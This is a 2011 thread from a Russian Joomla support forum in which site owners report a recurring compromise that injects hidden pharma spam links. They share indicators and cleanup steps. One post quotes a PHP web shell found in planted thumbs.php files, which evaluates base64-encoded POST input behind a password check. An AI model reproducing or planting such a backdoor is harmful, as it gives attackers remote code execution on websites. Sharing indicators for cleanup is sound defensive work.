Форум русской поддержки Joomla!® CMS
08.12.2016, 13:54:03 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1] 2  Все   Вниз
  Добавить закладку  |  Печать  
Автор

Подозрение на заражение

 (Прочитано 7732 раз)
0 Пользователей и 1 Гость смотрят эту тему.
argon06
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Сообщений: 50


« : 03.03.2011, 17:38:08 »

Случайно в браузере после ног увидел лишний текст, просмотр через гугло бот подтвердили опасения
Код:
</div>
</div> <!-- //FOOTER -->
</div>

<!--cacheb--><p><a href="http://profilsup.fr/" title="generique viagra discount">generique viagra discount</a> | </p><!--cachee-->
</body>
</html>

перерыл весь шаблон (ja_purity_ii) и нашел в папке  layouts в файлах    
  • default-joomla.php
  • default.php
  • handheld.php
  • iphone.php
  • left-main-right.round.php
  • left-main-right.square.php
  • left-right-main.round.php
  • left-right-main.square.php
  • main-right-left.round.php
в самом низу нашлась строчка:
Код:
<!--cacheb--><?php if (defined('JOOMLA_CACHE')) { echo JOOMLA_CACHE; } ?><!--cachee-->
Знающие люди, подскажите откуда берется эта реклама и как почистить кроме того что бы удалить эту строку из всех файлов!
Буквально месяц назад на сайте был iframe-вирус, излечился и пароли все сменил, а сейчас снова такое!

Записан
askona
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Пол: Мужской
Сообщений: 98



« Ответ #1 : 09.03.2011, 20:55:50 »

Такая же фигня . Причем код из шаблона удаляешь, меняешь все пароли  иопять он появляется через день. Подскажите как от этого избавиться. FTP пароль сменил, после смены вообще не заходил по FTP а код все равно появился. Помогите пожалуйста.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3488


skype aqaus.com


« Ответ #2 : 09.03.2011, 21:34:10 »

Скорее всего ломают через какое то уязвимое расширение или залит шелл который вы не убрали.
Записан
askona
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Пол: Мужской
Сообщений: 98



« Ответ #3 : 09.03.2011, 22:17:11 »

Скорее всего ломают через какое то уязвимое расширение или залит шелл который вы не убрали.
А как его найти? Помимо этого прописывается в папках tmp cache и images/stories файл thumbs.php
в котором вот такой код:
<?php if(md5($_POST["password"])=="42554769b6d9a25f116f0ca87f66c85a"){eval(base64_decode($_POST["code"]));} ?>   больше пока ничего не нашел. Взлом был 2 марта 2011 года
Записан
argon06
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Сообщений: 50


« Ответ #4 : 11.03.2011, 16:33:55 »

thumbs.php- удаляй везде где найдешь, потом если старая версия нужно обязательно обновиться до последней (у меня была 1.5.12)
еще посмотри сайт на наличие файлика processor.jpg, особенно в папках от модулей/компонентов и т.д. так же рядом с эти файлом может быть еще с примерным названием link.*.db (точно не помню название), проверяй папки с название tmp вся дрянь как правило там.
И еще построчно посмотри код index.php в твоем шаблоне, у меня где то в середине был include на processor.jpg, так же стоит обратить внимание на footer.php
Записан
askona
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Пол: Мужской
Сообщений: 98



« Ответ #5 : 12.03.2011, 10:09:54 »

спасибо, посмотрю.
Записан
argon06
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Сообщений: 50


« Ответ #6 : 14.03.2011, 14:32:40 »

ну и еще совет, который дают везде - почаще делать бэкапы
Записан
pavel55
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Пол: Мужской
Сообщений: 30


« Ответ #7 : 29.03.2011, 17:09:17 »

У меня такая же беда: http://joomlaforum.ru/index.php?topic=157547.new;topicseen#new

Удалил как написано выше все, но все равно на сайте генерируется скрытый текст.  Где этот вирус сидит так и не разобрался.  Может кто подскажет, на что ещё можно обратить внимание?
Записан
busik
Осваиваюсь на форуме
***

Репутация: +7/-0
Offline Offline

Сообщений: 165


« Ответ #8 : 29.03.2011, 17:12:48 »

В принципе у всех оно приблизительно одинаковое, если у каких-то сильно отличается - смотрите их внимательно. У меня несколько раз врезали код вверху, один раз внизу. И еще один раз модифицировали не .php файлы, а index.html, который в Жумле почти в каждой папке
Записан
argon06
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Сообщений: 50


« Ответ #9 : 30.03.2011, 14:20:25 »

и как правило вся эта дрянь идет из временных папок компонентов и модулей, стоит внимательно проверить их
Записан
svoloth
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 7



« Ответ #10 : 04.04.2011, 13:09:37 »

удали libraries/joomla/loader.php и заблокируй IP  который найдеш  в loader.php (78.159.101.232).
Записан
pavel55
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Пол: Мужской
Сообщений: 30


« Ответ #11 : 04.04.2011, 13:36:58 »

удали libraries/joomla/loader.php и заблокируй IP  который найдеш  в loader.php (78.159.101.232).

Спасибо, удалил! Наверное глупый вопрос, но как этот IP заблокировать? У хостера просить?
Записан
pavel55
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Пол: Мужской
Сообщений: 30


« Ответ #12 : 04.04.2011, 14:05:08 »

Хостер посоветовал так сделать:
Цитировать
Добавьте в файл .htaccess, который находится в корне Вашего сайта:
deny from 78.159.101.232
Этой записью Вы запретите доступ к Вашему сайту с этого IP-адреса.
Записан
svoloth
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 7



« Ответ #13 : 04.04.2011, 15:21:35 »

Хостер посоветовал правильно  Smiley
Записан
fatseo
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 11


« Ответ #14 : 04.04.2011, 19:15:32 »

Народ, на всех своих сайтах обнаружил подобный взлом.
Joomla 1.5.22.
Походу это массовая атака, и используется для простановки seo ссылок - что кстати может загнать ваш сайт в бан Яндекса.

Где-то уязвимость через которую залит шелл.
Блокируя IP и удаляя файлы - уязвимость остается всё равно.

Кому-нибудь удалось её найти?
Записан
Antik_26
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 33



« Ответ #15 : 30.04.2011, 17:39:11 »

Тоже имею данную проблему. Как бороться?
Записан
busik
Осваиваюсь на форуме
***

Репутация: +7/-0
Offline Offline

Сообщений: 165


« Ответ #16 : 02.05.2011, 22:01:40 »

Хостер посоветовал правильно  Smiley

Я так с дури в свое время роботов Яндексовских запретил Azn
Записан
voland
Профи
********

Репутация: +488/-86
Offline Offline

Пол: Мужской
Сообщений: 8720


любит наш народ всякое гавно...


« Ответ #17 : 03.05.2011, 00:35:48 »

У кого есть такая проблема..
И ЕСТЬ логи доступа за период когда она появилась - ссылку на архив с логами в личку, посмотрю.
При отсутсвии логов за нужный период - не писать.
Записан
svoloth
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 7



« Ответ #18 : 03.05.2011, 10:06:07 »

в логах ничего нет, смотрел HTTP и FTP
Записан
EDO
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #19 : 08.05.2011, 20:18:22 »

Вот и моё время пришло ))))
Всем привет. Нашёл следующее по теме:
http://help.yandex.ru/webmaster/?id=1116584

И кон у себя такой нашёл в файле, которого не должно быть \libraries\joomla\loader.php -  удалил. Всего было два, оставил один.

to argon06: Спаибо, нашёл 4 thumbs.php и удалил с похожим на <?php if(md5($_POST["password"])=="42554769b6d9a25f116f0ca87f66c85a"){eval(base64_decode($_POST["code"]));} ?> кодом.

Ищу дальше. После чистки нужно обновлять. Пока только не совсем понятно, на сайте не нашёл переходного файла с 1.5.12 до последней, попробую 1.5.1_ закинуть.

Далее:
Ктото пытаеться ломать и ломать...
Есть интересный файлик error_log рекомендую глянуть. Там много интересного связанного с файлом \libraries\joomla\loader.php

Спустя несколько часов:
Обновил, почистил и SEF404 выдал следующее, спустя минут 30 после перезаливки
Статус Безопасности: May-2011 [Обновить] (2011-05-09 01:00:58)
Насчитано атак   45    0.2 /h
Слишком много запросов (флуд)   45   100.0 % | 000.2 /h
===
Я так понимаю, что это группа людей с серверами.
В инете всё больше и больше инфы про аналогичные случаи.
Но решения пока нету Azn Есть только меры предосторожности...
Видимо ктото хочет добить Joomla.
Глянем логи.. ничего необычного...

Будем следить и дальше...
« Последнее редактирование: 09.05.2011, 01:45:57 от EDO » Записан
svoloth
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 7



« Ответ #20 : 09.05.2011, 12:25:38 »

переместил configuration.php  в другое место, ссылки невыводится, но код вставлают
Записан
EDO
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #21 : 09.05.2011, 14:27:31 »

to svoloth: configuration.php с каким доступом? 0444?

Ещё я снёс Authentication - OpenID, Authentication - GMail и Authentication - LDAP.
Они не активны по умолчанию, но возможно это тоже дыры...
Гдето в логах обращение к OpenID проскакивало..
Записан
svoloth
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 7



« Ответ #22 : 09.05.2011, 19:09:05 »

Цитировать
configuration.php с каким доступом? 0444?
644
Записан
EDO
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #23 : 09.05.2011, 23:20:34 »

644
Я попробовал поставить 0444 на configuration.php, .htaccess, index.php (тот, что в templates).
Это ко всему вышеописанному.
Записан
EDO
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #24 : 04.06.2011, 11:22:29 »

Ну вот... Прошло почти месяц со дня чистки и некоторых (выше-описанных) манипуляций.
Новых атак пока не наблюдается.
Думаю, что дыры всё-таки тут: Authentication - OpenID, Authentication - GMail и Authentication - LDAP.
Записан
SmokerMan
Профи
********

Репутация: +694/-25
Online Online

Пол: Мужской
Сообщений: 5225



« Ответ #25 : 06.06.2011, 11:39:33 »

Думаю, что дыры всё-таки тут: Authentication - OpenID, Authentication - GMail и Authentication - LDAP.
нету там никаких дыр.
Записан
voland
Профи
********

Репутация: +488/-86
Offline Offline

Пол: Мужской
Сообщений: 8720


любит наш народ всякое гавно...


« Ответ #26 : 09.06.2011, 22:28:36 »

Опять попался..
логи пустые, время одно
Остается 2 варианта - кража фтп-доступа (хотя клиент до этого сидит на маке...) либо дыра у хостера.
Очередной клиент на infobox`е но саппорт не дает фтп-логи напрямую (через клиента итп... короче гемор, но отписал)
Записан
voland
Профи
********

Репутация: +488/-86
Offline Offline

Пол: Мужской
Сообщений: 8720


любит наш народ всякое гавно...


« Ответ #27 : 10.06.2011, 00:17:00 »

Написал быстренько скриптик удалять всю эту пакость
Если скрипт помог - можете донейтить на ЯД 41001251003183 или R545653827015 или Z267652009871
Записан
busik
Осваиваюсь на форуме
***

Репутация: +7/-0
Offline Offline

Сообщений: 165


« Ответ #28 : 10.06.2011, 23:57:03 »

Опять нашел на сайте вирусняк (троян), подсаженыей 28 мая (уж не знаю в какой раз). Задумался о дырах у провайдера ...
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3488


skype aqaus.com


« Ответ #29 : 11.06.2011, 10:48:01 »

Вы бы сайт показали. И список расширений и логи.
Записан
Страниц: [1] 2  Все   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet